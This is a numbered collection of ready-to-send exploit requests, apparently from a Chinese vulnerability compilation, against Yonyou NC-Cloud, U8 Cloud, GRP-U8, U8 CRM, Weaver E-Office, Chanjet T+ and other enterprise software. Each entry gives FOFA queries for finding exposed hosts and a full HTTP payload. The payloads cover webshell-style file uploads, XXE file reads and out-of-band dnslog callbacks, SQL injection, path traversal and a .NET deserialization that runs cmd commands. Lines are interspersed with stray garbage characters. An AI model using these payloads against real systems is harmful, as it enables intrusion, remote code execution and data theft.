& Z8 V- U4 y6 f% }2 M! o35. 用友NC-Cloud importhttpscer任意文件上传$ W! _9 z% X# q% ?4 _8 s: F
FOFA:app="用友-NC-Cloud"
: ]% y' l5 g; w* w2 [% r% v. E+ xPOST /nccloud/mob/pfxx/manualload/importhttpscer HTTP/1.1
- W" [3 S; f: g# f: \; ]Host: 203.25.218.166:8888
- i4 L( ?' q5 D( R: gUser-Agent: Mozilla/5.0 (Windows NT 5.1; rv:5.0) Gecko/20100101 Firefox/5.0 info
9 M) r0 s- q' a5 `% AAccept-Encoding: gzip, deflate+ o& V- c) Y7 N- D a ^
Accept: */*6 D7 R+ B; w [$ C
Connection: close
+ P# G, I) h; ]* ^$ D9 saccessToken: eyJhbGciOiJIUzUxMiJ9.eyJwa19ncm91cCI6IjAwMDE2QTEwMDAwMDAwMDAwSkI2IiwiZGF0YXNvdXJjZSI6IjEiLCJsYW5nQ29kZSI6InpoIiwidXNlclR5cGUiOiIxIiwidXNlcmlkIjoiMSIsInVzZXJDb2RlIjoiYWRtaW4ifQ.XBnY1J3bVuDMYIfPPJXb2QC0Pdv9oSvyyJ57AQnmj4jLMjxLDjGSIECv2ZjH9DW5T0JrDM6UHF932F5Je6AGxA {- M* ^) k% ~* L' E) \
Content-Length: 190. V# `: W1 E$ g: ]
Content-Type: multipart/form-data; boundary=fd28cb44e829ed1c197ec3bc71748df0; [' `# w. `6 X5 r8 E+ m# p
* Z7 u# S* d3 T7 K m) i2 A8 h" E
--fd28cb44e829ed1c197ec3bc71748df08 U, |/ U" u& w+ O" q# |
Content-Disposition: form-data; name="file"; filename="./webapps/nc_web/1.jsp"6 A7 K+ ^1 U% t% M
. G( } k* r: B0 i! e4 D
<%out.println(1111*1111);%>
( O0 Z6 D. U' I5 E3 _--fd28cb44e829ed1c197ec3bc71748df0--# r7 P1 m$ g& c& i( U j# v3 H
, p u$ Q5 ~; Y& R5 Y3 k
, V4 C8 m$ R7 q) E; b3 c$ S
36. 用友NC-Cloud soapFormat XXE
, l0 W1 } c( Q2 ?# N, pFOFA:body="/Client/Uclient/UClient.exe"||body="ufida.ico"||body="nccloud"||body="/api/uclient/public/"
9 u" X4 p2 @' F, v! n1 V# b/ E; iPOST /uapws/soapFormat.ajax HTTP/1.1" n3 d/ t7 Y9 l
Host: 192.168.40.130:8989" b5 \% G9 k: _
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/109.0
9 Y" {0 X1 L, xContent-Length: 2635 L. ?4 s; R6 _4 T w
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8/ ]$ p) d% D) I& M; t: H4 g
Accept-Encoding: gzip, deflate
' _) u& k, D- n3 b% V- sAccept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
- D8 Q; Z% j5 D4 z- ZConnection: close: V, x" K6 W; c
Content-Type: application/x-www-form-urlencoded0 \4 A. n+ e3 v# ]) X- h( ?, k( N: B
Upgrade-Insecure-Requests: 11 v) `5 {* h# e- _- @! b% F
) Z) P7 V8 }, _/ c
msg=<!DOCTYPE foo[<!ENTITY xxe1two SYSTEM "file:///C://windows/win.ini"> ]><soap:Envelope xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/"><soap:Body><soap:Fault><faultcode>soap:Server%26xxe1two%3b</faultcode></soap:Fault></soap:Body></soap:Envelope>%0a0 N, d( f J- `" r# M! F6 [
: l s( z2 J5 ^6 w! E+ L' c
5 ?3 _+ N3 r C% v
37. 用友NC-Cloud IUpdateService XXE
+ z3 t) G( i. f: M+ P' c& U. eFOFA:body="/Client/Uclient/UClient.exe"||body="ufida.ico"||body="nccloud"||body="/api/uclient/public/"3 V, k, h9 C2 m4 V/ @
POST /uapws/service/nc.uap.oba.update.IUpdateService HTTP/1.19 w, f( _& R8 b1 k! O2 ^
Host: 192.168.40.130:8989
' i# A# T7 t, W# O0 NUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36
' F/ C& a" c+ z3 G, k1 QContent-Length: 421- m! t: }; Z7 o$ {" ^# @
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
' }* E" j( }! R5 w: |7 \; e* _Accept-Encoding: gzip, deflate
0 b$ X) n. h- S& ]2 KAccept-Language: zh-CN,zh;q=0.9( I: P/ p5 i6 `
Connection: close
! U7 Q- f' J" nContent-Type: text/xml;charset=UTF-8
, L, j$ A% V. YSOAPAction: urn:getResult# S3 _# Y: p- `9 z" W4 Q
Upgrade-Insecure-Requests: 1
2 ^% I) b& k' ~- j3 P- Z( k5 |: m% T3 z/ X: E1 {
<soapenv:Envelope xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/" xmlns:iup="http://update.oba.uap.nc/IUpdateService">
8 E, |5 Y8 d9 N+ {" W/ |6 j( ~<soapenv:Header/># N( `" B) u, F6 J* E/ U: [
<soapenv:Body>7 G' d6 G- n% q
<iup:getResult>' ?) @; V$ x E
<!--type: string-->
" r8 Q& d+ W9 d A! P) D3 \1 L<iup:string><![CDATA[/ y! z' M* Y5 |8 e
<!DOCTYPE xmlrootname [<!ENTITY % aaa SYSTEM "http://c2vkbwbs.dnslog.pw">%aaa;%ccc;%ddd;]>3 I2 B' `) z: [( E: I2 {6 r
<xxx/>]]></iup:string>
7 x! O5 [3 K3 T! F: O- n</iup:getResult>* G; \/ K/ }/ `
</soapenv:Body>
8 s& r: _% c* w+ v) X% h, M</soapenv:Envelope>
, E; @0 c0 y" F' `8 J( \$ o; [6 \: K( n w; G
* a1 b" L; d4 Z, i! Y+ F. T
" J# |" J, {% e: m2 t4 ?4 o38. 用友U8 Cloud smartweb2.RPC.d XXE
* w) _7 E( w# o# J. q# zFOFA:app="用友-U8-Cloud"
& |* x) _% _" i- Y& l: R; hPOST /hrss/dorado/smartweb2.RPC.d?__rpc=true HTTP/1.1% _: V0 I/ B8 R1 o
Host: 192.168.40.131:8088
p* V9 S9 k' ~4 j6 }# Z( WUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 12_10) AppleWebKit/600.1.25 (KHTML, like Gecko) Version/12.0 Safari/1200.1.25* o1 {- V! J. h/ }' k6 Z2 l
Content-Length: 260
$ A3 z( z3 L5 `" j0 j& TAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3
1 }8 A; G4 i+ T( F& e; g7 VAccept-Encoding: gzip, deflate
B% O5 O# o+ I* w2 i+ l- ~8 pAccept-Language: zh-CN,zh;q=0.92 u X4 Z3 f* b% a5 ]0 U
Connection: close
6 n, [/ c8 H `9 eContent-Type: application/x-www-form-urlencoded, w0 ^3 V: y' M/ K, R8 {1 f' I
- o1 X8 n3 U5 P. W T
__viewInstanceId=nc.bs.hrss.rm.ResetPassword~nc.bs.hrss.rm.ResetPasswordViewModel&__xml=<!DOCTYPE z [<!ENTITY Password SYSTEM "file:///C://windows//win.ini" >]><rpc transaction="10" method="resetPwd"><vps><p name="__profileKeys">%26Password;</p ></vps></rpc>
S* z- u) X3 c9 `+ o6 c2 ]
" @" a4 C3 L& ]- p/ H1 t/ ?: u9 x) m ?, o5 @ @
39. 用友U8 Cloud RegisterServlet SQL注入
- |6 F7 r3 G7 }( v6 `FOFA:title="u8c") _, c/ ^: g% a4 U+ {% ?
POST /servlet/RegisterServlet HTTP/1.12 {; g* k. h" N( ]) T0 t( \
Host: 192.168.86.128:8089
. B. Q, E, r5 \& C2 q. XUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/54.0.2866.71 Safari/537.36. w2 a W( P7 m6 r: ?1 K8 T7 L
Connection: close& C* L& Y3 B1 M3 Z
Content-Length: 855 f* N" r+ Q2 ]& @. F" _9 l2 f
Accept: */*' U" R3 ^( y9 Q& I5 b: D K; T$ U
Accept-Language: en
9 C0 f: h" g. U* |4 TContent-Type: application/x-www-form-urlencoded
$ i4 F/ ~. n" X: sX-Forwarded-For: 127.0.0.1
$ c8 c- T8 _: @, B1 uAccept-Encoding: gzip
. E7 r4 B% N6 f, i2 O# n# C: W& l9 e& ]# Y5 @9 e
usercode=1' and substring(sys.fn_sqlvarbasetostr(HashBytes('MD5','123456')),3,32)>0--* @- L9 J( z. k, ~5 b. I
2 o: [& X s/ B: e
: O$ @" t) {/ k" P# ~40. 用友U8-Cloud XChangeServlet XXE) A; J$ t/ @6 H) M4 Y
FOFA:app="用友-U8-Cloud"
h+ F7 B* I& N. XPOST /service/XChangeServlet HTTP/1.17 i5 v1 k$ |- w; D7 i
Host: x.x.x.x
, d4 S) I. ~5 U9 ?User-Agent: Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/107.0.0.0 Safari/537.36
% y/ ~# i1 H4 s- sContent-Type: text/xml
. k% E% D- @: AConnection: close2 u" x: t; d0 a/ C
3 S7 ~5 V) |7 g& l6 e9 p<!DOCTYPE r [<!ELEMENT r ANY ><!ENTITY xxe SYSTEM "http://farr9frh.dnslog.pw">]><r><a>&xxe;</a ></r>
- T- T6 m8 r, T) |) [' b E9 o2 | Y0 R/ }+ {/ P! B% e; w
! Y7 C# v6 q' ^. `! m
41. 用友U8 Cloud MeasureQueryByToolAction SQL注入
. k- w* G2 w5 }4 H$ g3 q9 j+ n# D+ CFOFA:app="用友-U8-Cloud"
8 N9 E, {; N+ b0 NGET /service/~iufo/com.ufida.web.action.ActionServlet?action=nc.ui.iufo.query.measurequery.MeasureQueryByToolAction&method=execute&query_id=1%27);WAITFOR+DELAY+%270:0:5%27--+ HTTP/1.1! j& K& I- }/ a4 a1 Z( @
Host:
" g! F3 r$ k) c6 [; qUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
9 n0 i& U8 b4 q% A: KContent-Type: application/json
+ l4 Y$ \ n6 } f9 {# OAccept-Encoding: gzip( v3 B8 R2 R$ H$ l3 `
Connection: close, I7 \% T0 I$ B0 l/ n( ~9 `
! [0 L- R0 r9 p
# k, F* p1 n! D42. 用友GRP-U8 SmartUpload01 文件上传! `% g5 ?) l) Q5 c* h
FOFA:app="用友-GRP-U8": y4 E% W) h3 @* V
POST /u8qx/SmartUpload01.jsp HTTP/1.1. L. _$ s% e( K) ?- m
Host: x.x.x.x& ^0 \4 Q% M' ^4 R( f
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryzhvrkrqt& [; I/ m& b& G* e! l9 _; P
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2062.124 Safari/537.364 G- M7 \2 w+ |( y
7 p+ n, q8 J' `2 v7 I# @! WPAYLOAD$ S9 @9 t* V# k0 W3 f. [
- _4 t# {$ b! [% G1 U1 g u
& \8 v1 R& ~: O& m, z- Z8 Qhttp://x.x.x.x/jatoolsreport?file=/1.pdf&as=dhtml
0 M! n2 H. p% e; [
# h; L8 P8 }; a, E/ k43. 用友GRP-U8 userInfoWeb SQL注入致RCE& |$ F/ O" n ]/ [2 m3 r
FOFA:app="用友-GRP-U8"' X7 H: ]1 J: e, r2 j; f
POST /services/userInfoWeb HTTP/1.1
/ `! }0 H& O& T9 `/ |6 s% ]Host: your-ip/ h( P$ ^3 t: n
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36(KHTML, like Gecko) Chrome/93.0.4577.63 Safari/537.36
, x8 u7 \3 \6 e% h2 HAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.72 `1 |* ?" a* U9 ]5 N. g4 C; w
Accept-Encoding: gzip, deflate
: Z! d! S0 S; V, {3 J" ^0 h' GAccept-Language: zh-CN,zh;q=0.9/ W" b" \. `9 I7 m
Connection: close9 x( {8 T( h2 k5 ~ D9 Z# H; x6 u
SOAPAction:
. R0 M# q" M/ v4 a' M3 bContent-Type: text/xml;charset=UTF-8+ G5 G# H7 t) ~7 N1 k* T# K
8 ^* q8 x9 F0 h3 ]- v+ U
<soapenv:Envelope xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/" xmlns:ser="http://service.pt.midas.ufgov.com">! }, D" J# k$ d
<soapenv:Header/>
' ~, B; W) y7 j <soapenv:Body>
( s& Z k6 L4 R0 F7 ]! V <ser:getUserNameById soapenv:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/">" F. w' A V2 _8 X x$ y7 Q& V) r
<userId xsi:type="soapenc:string" xmlns:soapenc="http://schemas.xmlsoap.org/soap/encoding/">';waitfor delay '0:0:5'--</userId>; l0 }/ d# |2 n$ {( w
</ser:getUserNameById>
% M5 i3 G {/ s, v" s0 e- Z </soapenv:Body> ]- D, @. ~7 l! H$ a/ o5 Q
</soapenv:Envelope>
, W" H3 O) ?/ E1 [0 {; M$ g
. T9 _% p- w1 c5 M$ G. _0 K: d2 v2 a3 Y2 S3 z9 f
44. 用友GRP-U8 bx_dj_check.jsp SQL注入
, O8 P; s, u7 H5 l; I: U& {' Z0 NFOFA:app="用友-GRP-U8"
- Q9 b# h( C, v9 rGET /u8qx/bx_dj_check.jsp?djlxdm=OER&djid=1';waitfor+delay+'0:0:5'-- HTTP/1.1( b' _* n/ T- H3 X1 B" ~
Host: your-ip
# g6 }! i' O \4 U, C6 ]' b- ?( UUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/110.0.0.0 Safari/537.36" g2 O1 _! j1 a1 t% C
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
% [7 c8 r- ~; U* T1 L yAccept-Encoding: gzip, deflate3 w) o! P7 i; o) u J
Accept-Language: zh-CN,zh;q=0.9
. V1 N% k2 G; ]6 Y/ u1 S* KConnection: close4 V2 z# c# S% @0 G
3 ?: P7 Y% f% B0 f# [" C" e, p1 m3 v$ t k
45. 用友GRP-U8 ufgovbank XXE
+ ]9 {; j/ `- W; r$ n' F7 UFOFA:app="用友-GRP-U8"
9 F! b! @+ I% ?) S; o( GPOST /ufgovbank HTTP/1.1
/ y& f+ M$ d5 S- E- a& o& H( mHost: 192.168.40.130:222
- b T0 K/ ^! KUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:104.0) Gecko/20100101 Firefox/104.06 b; _, X8 @, {; n
Connection: close
9 A+ Z& V1 ^& K+ ~Content-Length: 161! F4 P- R+ k# N! }0 T
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
, n. _3 b( h% t1 P: N& aAccept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
! D7 P; ?( E$ v* o' wContent-Type: application/x-www-form-urlencoded4 n# V2 F" K2 k4 v$ ~
Accept-Encoding: gzip
! B! g/ b( G, u2 d0 g9 j; N: X( a. q& i
reqData=<?xml version="1.0"?>
' m! N `% ]. T, D1 h9 `& i<!DOCTYPE foo SYSTEM "http://c2vkbwbs.dnslog.pw">&signData=1&userIP=1&srcFlag=1&QYJM=0&QYNC=adaptertest7 c7 G; V6 a6 C: S& }1 N. b
5 ~! s/ V+ O" z9 a% k- n. c5 ^( |
7 v: b- ?. ?- N6 P' c) d. v46. 用友GRP-U8 sqcxIndex.jsp SQL注入2 J0 B) ~( Y$ a+ R5 v1 z; L3 @3 D W
FOFA:app="用友-GRP-U8"
" `9 k% ~5 [" `+ z& R* I" uGET /u8qx/sqcxIndex.jsp?key=1');+waitfor+delay+'0:0:5'-- HTTP/1.1
$ L% A( H* Z8 nHost: your-ip2 ?: x' Y: h+ l# ]9 ]; G/ B
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/112.0.0.0 Safari/537.36+ z/ W" u: d( v( y4 V8 A
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7' D8 }( o3 R& ~/ b7 C! Z
Accept-Encoding: gzip, deflate5 F9 W: |$ I6 ]; A( t% ^
Accept-Language: zh-CN,zh;q=0.97 m( F) c' x& Y% d
Connection: close; g. ~8 ^- X2 f1 B, L K
7 x4 h4 E0 ?8 |' Z# ]6 }/ a# O4 ?- i- J
( D9 Q8 P8 Q* I- ?9 ?8 m4 n* P47. 用友GRP A++Cloud 政府财务云 任意文件读取. R" |! u+ ]+ t: j; a3 g- x
FOFA:body="/pf/portal/login/css/fonts/style.css"
. n, }+ D3 m( H0 O/ w& o" sGET /ma/emp/maEmp/download?fileName=../../../etc/passwdHTTP/1.1
& z2 a' [( W3 m, WHost: x.x.x.x; v+ T* d2 c' k
Cache-Control: max-age=0
$ ~1 h& ]) A" pUpgrade-Insecure-Requests: 12 t8 y8 X: E8 F; F) H6 c }5 T
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36
# k1 a- V7 r( b2 v6 u$ P7 KAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.79 D1 f: c- k$ F
Accept-Encoding: gzip, deflate, br$ e5 d) ^1 e6 n2 z* Q1 O- Z
Accept-Language: zh-CN,zh;q=0.9
4 k& l( C# U1 n. A: DIf-Modified-Since: Wed, 11 Oct 2023 05:16:05 GMT" l# g7 w) j- A4 e, X- p. q' M
Connection: close
x2 q5 u2 k2 C; |( L. [
& x, y" K8 a3 _/ N5 i+ f! X, l7 E8 L' I9 N
6 \$ A$ M, ^% z4 Y( ^
48. 用友U8 CRM swfupload 任意文件上传7 I d, i9 n* }/ d. [& ?
FOFA:title="用友U8CRM"
|% O. Z3 o& |4 O- [POST /ajax/swfupload.php?DontCheckLogin=1&vname=file HTTP/1.1' { E/ t8 g' q. C6 K/ z
Host: your-ip8 h( z6 W3 d4 m/ [1 V3 H, s3 g
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.07 ^9 T( j/ O7 \1 q/ A6 {
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
3 x9 `. V, k& L: j5 ]8 U; B( eAccept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2- a ` G& K5 U" F: A5 t1 `
Accept-Encoding: gzip, deflate4 `' j4 J1 ]! o' v
Content-Type: multipart/form-data;boundary=----269520967239406871642430066855: g0 t x/ L, Z5 S7 X9 [% D5 U. |' N
------269520967239406871642430066855: e6 l& `: e$ O7 [$ N" |' Q& T T
Content-Disposition: form-data; name="file"; filename="s.php": K5 g! v5 W6 H( a% B) V
1231
8 b- i* V$ w. }1 d! f( G& t* JContent-Type: application/octet-stream
! m5 l* w) Q6 t------2695209672394068716424300668552 Y* h% s7 f2 O
Content-Disposition: form-data; name="upload"
: D5 A, {$ ?% S9 Y# g* J- Bupload* W4 z: j+ l7 {8 W
------269520967239406871642430066855--) X) k; U+ V2 M
% J# D* v4 Y d% J
. }: l+ W2 D/ d49. 用友U8 CRM系统uploadfile.php接口任意文件上传. t6 s' {# T: `+ R* {0 p
FOFA:body="用友U8CRM"/ W0 V7 {7 V% N1 q( i8 r. B
9 \* h3 v* f" J( Y9 _
POST /ajax/uploadfile.php?DontCheckLogin=1&vname=file HTTP/1.1# o( T: f% C* E: f6 }. u
Host: x.x.x.x* @7 d1 ^% k' ?- G% K
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0
$ d- D0 s" p( P- w% r- o. }Content-Length: 329. p3 Q. |8 ~9 G4 }4 e/ k$ L" d. q
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
5 z# j( Z% t2 Y; KAccept-Encoding: gzip, deflate5 r( V) Q3 d& _- d" X" D% k) j z
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2" i$ A1 T+ W1 ?0 H) Q. |
Connection: close
- r- _2 D0 ~: x( T' B/ XContent-Type: multipart/form-data; boundary=---------------------------vvv3wdayqv3yppdxvn3w
' ]: h: N. o- |# p4 p$ m: L: m" l( V9 k; y Z
-----------------------------vvv3wdayqv3yppdxvn3w
) J! ~9 Z/ i8 g; r# I% P8 MContent-Disposition: form-data; name="file"; filename="%s.php "# U8 x5 |7 ]2 S; F% ~
Content-Type: application/octet-stream
! f4 H7 F2 J3 L. J# w( @0 R& f! L5 g6 B. D
wersqqmlumloqa, B2 z6 p0 ]+ Z
-----------------------------vvv3wdayqv3yppdxvn3w
" `' W% W! Z0 _& D+ P* h! GContent-Disposition: form-data; name="upload"$ B- g2 k4 q8 J, w
$ k8 S* o$ q4 [; v) Aupload
9 C7 V* K8 Y/ x# ]# M-----------------------------vvv3wdayqv3yppdxvn3w--
# W2 F* p4 q1 c, e5 q. k$ f0 w3 z' o; }
) K2 w- |9 m8 F$ P4 ~) n% R phttp://x.x.x.x/tmpfile/updB3CB.tmp.php* W. g& Q" b# m. I4 l
" K( N3 I5 Q$ {0 q
50. QDocs Smart School 6.4.1 filterRecords SQL注入7 K, q3 O3 `' R
FOFA:body="close closebtnmodal"
0 U2 D! n! \- h5 `POST /course/filterRecords/ HTTP/1.1+ W# e1 j9 ]# G, e
Host: x.x.x.x8 j3 r: {, J( U0 d, p
User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.364 \& r3 u# |: |9 z# C4 }' `- w
Connection: close* S$ w" N6 }& V e1 e/ M2 ^/ p
Content-Length: 224: L3 t: J) b* V2 F! W* \# [; g
Accept: */*
( u1 @/ Z, w5 m, u" BAccept-Language: en+ ^9 B9 v% X" O3 h0 ~: e$ M
Content-Type: application/x-www-form-urlencoded
8 L) n) N# t0 x, PAccept-Encoding: gzip4 ^4 }+ ~7 S8 i, i/ K
5 e* {/ U# O7 u, {: S* Asearchdata[0][title]=&searchdata[0][searchfield]=1&searchdata[0][searchvalue]=1&searchdata[1][title]=1&searchdata[1][searchfield]=1=1 and extractvalue(1,concat(0x5e,(select md5(123456)),0x5e))%23&searchdata[1][searchvalue]=15 x+ x! J, R1 _5 a2 G) b
! E; Z$ Y8 H8 x4 h; o- d. N w( \: W0 K3 z+ _+ G% V' h
51. 云时空社会化商业 ERP 系统 validateLoginName SQL 注入
, W, x3 k/ ?9 F2 Y6 N2 g: v k6 BFOFA:app="云时空社会化商业ERP系统"
) G+ D1 e, D$ vGET /sys/user/validateLoginName?loginName=admin'+AND+4563=DBMS_PIPE.RECEIVE_MESSAGE(CHR(65),5)-- HTTP/1.1
. {" M7 A3 w. E+ E `Host: your-ip
+ Z6 t' s: f2 u- LUser-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.198 Safari/537.36
) T' o9 @. V( `; E/ j7 XAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
: Z V* q2 m. ^' M% ZAccept-Encoding: gzip, deflate
+ @6 K) W9 x4 L6 w( MAccept-Language: zh-CN,zh;q=0.9 [, P' _* g& F
Connection: close: Y w. ?! }, R
4 B+ p9 r3 x7 O" W8 l, N; T5 {2 O! C7 J6 @9 r* ?4 I- _2 u1 b! V
52. 泛微E-Office json_common.php sql注入6 ? [. _( q$ |) p4 v+ H
FOFA:app="泛微-EOffice"/ k- G% h" x2 _: }5 c9 {
POST /building/json_common.php HTTP/1.1
, h' n8 ]5 j, o3 A/ v! Y( UHost: 192.168.86.128:8097; ~; ~+ Y/ n. j: E
User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36: y3 \# k; ?& @ r) I
Connection: close
8 H% L. u6 {3 V2 S( ^7 J2 s( IContent-Length: 87+ G. b/ }; b) W* }% \
Accept: */*
" K0 y6 k* L; d& WAccept-Language: en
+ c6 U1 Y9 V& ]. f- m" EContent-Type: application/x-www-form-urlencoded
) {% e" D3 W2 X0 }3 A' E( Q% nAccept-Encoding: gzip
" I& O3 _" \ q, J" O. N ^$ @, x% {7 ?! ^4 z
tfs=city` where cityId =-1 /*!50000union*/ /*!50000select*/1,2,md5(102103122) ,4#|2|333
2 h+ T% l0 S& D, ]* Y' K, V4 [
: y) z5 W! U- d' s* b7 r, R c! z4 v- [6 p1 \, M6 V* u4 s
53. 迪普 DPTech VPN Service 任意文件上传
" ?3 Z& u: Q; X+ F0 pFOFA:app="DPtech-SSLVPN"
$ |% J1 G* X+ d$ i/..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd1 i3 @# I- X& H4 j
1 D; `8 U" I+ S0 y+ J4 U
/ n5 z- q4 F' i P1 P! P54. 畅捷通T+ getstorewarehousebystore 远程代码执行4 ^. d0 K6 u' E6 |% {/ a
FOFA:app="畅捷通-TPlus"* c1 A1 _# ?0 ]7 U Y/ z( m% N* ~
第一步,向目标发送数据包,执行命令,将指定字符串写入指定文件
% d/ j8 `# n1 |0 j( j9 J"/c echo 2WcBDoxC7JXhegsmOp6vJJ2dZBl > .2WcBDoxC7JXhegsmOp6vJJ2dZBl.txt"* D/ H# y% S5 K, E% T) W
+ e" f/ E% b w4 Y, c/ X9 A- p
# a3 g: K8 d8 C; I4 R+ D
完整数据包
1 [5 E$ F* }) M7 t$ }POST /tplus/ajaxpro/Ufida.T.CodeBehind._PriorityLevel,App_Code.ashx?method=GetStoreWarehouseByStore HTTP/1.1
% O: a: C% |) SHost: x.x.x.x
& A/ w+ i1 ~2 O5 H. ?User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/34.0.1847.137 Safari/4E423F1 h# T; x8 i& W* A L& }
Content-Length: 593
" n8 [- M. H. W6 }) E+ p U/ Z( [$ G- f, ?4 |# k% ^' d
{
4 f" ~. Y4 M; `* c8 d"storeID":{4 x7 p3 r- h! V# H" i9 P
"__type":"System.Windows.Data.ObjectDataProvider, PresentationFramework, Version=4.0.0.0, Culture=neutral, PublicKeyToken=31bf3856ad364e35",0 P; i6 |9 \: }' M
"MethodName":"Start",5 r9 o0 j j: L5 g. K
"ObjectInstance":{6 }! R* _3 i6 g o% [0 l" t
"__type":"System.Diagnostics.Process, System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089",/ N/ h" X4 g3 k* a: X
"StartInfo":{
' T5 J1 o- a/ i6 D: ~) v "__type":"System.Diagnostics.ProcessStartInfo, System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089"," ^, l) C( i0 [% w
"FileName":"cmd",
9 u% G o+ L# t$ l) y- d "Arguments":"/c echo 2WcBDoxC7JXhegsmOp6vJJ2dZBl > .2WcBDoxC7JXhegsmOp6vJJ2dZBl.txt"+ B; [- @2 I$ `; H( a
}0 x2 p3 n0 U$ p# ` k
}! c ^+ ]2 F4 H+ @9 \1 `! o
}+ T8 q& c" a5 v
}
# e' u _7 P# v3 x( \- R+ m! v- `
" p# _, f+ R2 V5 ]0 G9 m第二步,访问如下url
. p& T" f2 D4 ~8 o; `8 g2 z8 f/tplus/.2WcBDoxC7JXhegsmOp6vJJ2dZBl.txt
% {* B7 }% h* c7 @) j) t5 c3 ^' p; T; ?2 I) k: R9 U- M
' i# f2 d8 ~9 B4 _55. 畅捷通T+ getdecallusers信息泄露* n+ N7 A( y) C: D
FOFA:app="畅捷通-TPlus"
9 S9 u8 U5 D$ _( E) _0 m第一步,通过
1 I. z* A" R2 }0 g2 W. h0 O/tplus/ajaxpro/Ufida.T.SM.Login.UIP.LoginManager,Ufida.T.SM.Login.UIP.ashx?method=CheckPassword接口获取Cookie- \+ w" n, h) }& _3 X2 U8 a
第二步,利用获取到的Cookie请求
/ m' w0 c( f/ f7 [7 y8 U" U) }/tplus/sm/privilege/ajaxpro/Ufida.T.SM.UIP.Privilege.PreviligeControl,Ufida.T.SM.UIP.ashx?method=GetDecAllUsers
8 {# j& B+ @0 t0 q7 ]& L5 c# @0 Y8 r" ?
56. 畅捷通T+ RRATableController,Ufida.T.DI.UIP.ashx 反序列化RCE
4 G1 j! F5 \, b. p" X2 i* o8 YFOFA: app="畅捷通-TPlus"7 }+ z2 k; A2 P3 L, r
POST /tplus/ajaxpro/Ufida.T.DI.UIP.RRA.RRATableController,Ufida.T.DI.UIP.ashx?method=GetStoreWarehouseByStore HTTP/1.1
9 ?3 v; c4 v8 W' n4 }' kHost: x.x.x.x3 T% d+ X% Y) ^
